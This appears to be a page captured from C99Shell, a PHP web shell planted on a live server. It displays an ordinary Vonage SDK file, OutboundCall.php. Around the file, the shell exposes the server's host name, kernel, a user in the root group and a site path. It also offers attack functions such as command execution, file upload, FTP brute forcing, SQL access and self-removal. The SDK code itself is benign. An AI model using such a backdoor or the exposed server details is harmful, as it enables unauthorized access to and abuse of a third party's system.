!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html_old/vendor/vonage/client-core/src/Voice/   drwxr-xr-x
Free 28.84 GB of 117.98 GB (24.44%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OutboundCall.php (3.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Vonage Client Library for PHP
 *
 * @copyright Copyright (c) 2016-2020 Vonage, Inc. (http://vonage.com)
 * @license https://github.com/Vonage/vonage-php-sdk-core/blob/master/LICENSE.txt Apache License 2.0
 */

declare(strict_types=1);

namespace 
Vonage\Voice;

use 
InvalidArgumentException;
use 
Vonage\Voice\Endpoint\EndpointInterface;
use 
Vonage\Voice\Endpoint\Phone;
use 
Vonage\Voice\NCCO\NCCO;

class 
OutboundCall
{
    public const 
MACHINE_CONTINUE 'continue';
    public const 
MACHINE_HANGUP 'hangup';

    
/**
     * @var Webhook
     */
    
protected $answerWebhook;

    
/**
     * @var Webhook
     */
    
protected $eventWebhook;

    
/**
     * @var Phone
     */
    
protected $from;

    
/**
     * Length of seconds before Vonage hangs up after going into `in_progress` status
     *
     * @var int
     */
    
protected $lengthTimer;

    
/**
     * What to do when Vonage detects an answering machine.
     *
     * @var ?string
     */
    
protected $machineDetection;
    
/**
     * @var NCCO
     */
    
protected $ncco;

    
/**
     * Length of time Vonage will allow a phone number to ring before hanging up
     *
     * @var int
     */
    
protected $ringingTimer;

    
/**
     * @var EndpointInterface
     */
    
protected $to;

    public function 
__construct(EndpointInterface $toPhone $from)
    {
        
$this->to $to;
        
$this->from $from;
    }

    public function 
getAnswerWebhook(): ?Webhook
    
{
        return 
$this->answerWebhook;
    }

    public function 
getEventWebhook(): ?Webhook
    
{
        return 
$this->eventWebhook;
    }

    public function 
getFrom(): Phone
    
{
        return 
$this->from;
    }

    public function 
getLengthTimer(): ?int
    
{
        return 
$this->lengthTimer;
    }

    public function 
getMachineDetection(): ?string
    
{
        return 
$this->machineDetection;
    }

    public function 
getNCCO(): ?NCCO
    
{
        return 
$this->ncco;
    }

    public function 
getRingingTimer(): ?int
    
{
        return 
$this->ringingTimer;
    }

    public function 
getTo(): EndpointInterface
    
{
        return 
$this->to;
    }

    
/**
     * @return $this
     */
    
public function setAnswerWebhook(Webhook $webhook): self
    
{
        
$this->answerWebhook $webhook;

        return 
$this;
    }

    
/**
     * @return $this
     */
    
public function setEventWebhook(Webhook $webhook): self
    
{
        
$this->eventWebhook $webhook;

        return 
$this;
    }

    
/**
     * @return $this
     */
    
public function setLengthTimer(int $timer): self
    
{
        
$this->lengthTimer $timer;

        return 
$this;
    }

    
/**
     * @return $this
     */
    
public function setMachineDetection(string $action): self
    
{
        if (
$action === self::MACHINE_CONTINUE || $action === self::MACHINE_HANGUP) {
            
$this->machineDetection $action;

            return 
$this;
        }

        throw new 
InvalidArgumentException('Unknown machine detection action');
    }

    
/**
     * @return $this
     */
    
public function setNCCO(NCCO $ncco): self
    
{
        
$this->ncco $ncco;

        return 
$this;
    }

    
/**
     * @return $this
     */
    
public function setRingingTimer(int $timer): self
    
{
        
$this->ringingTimer $timer;

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--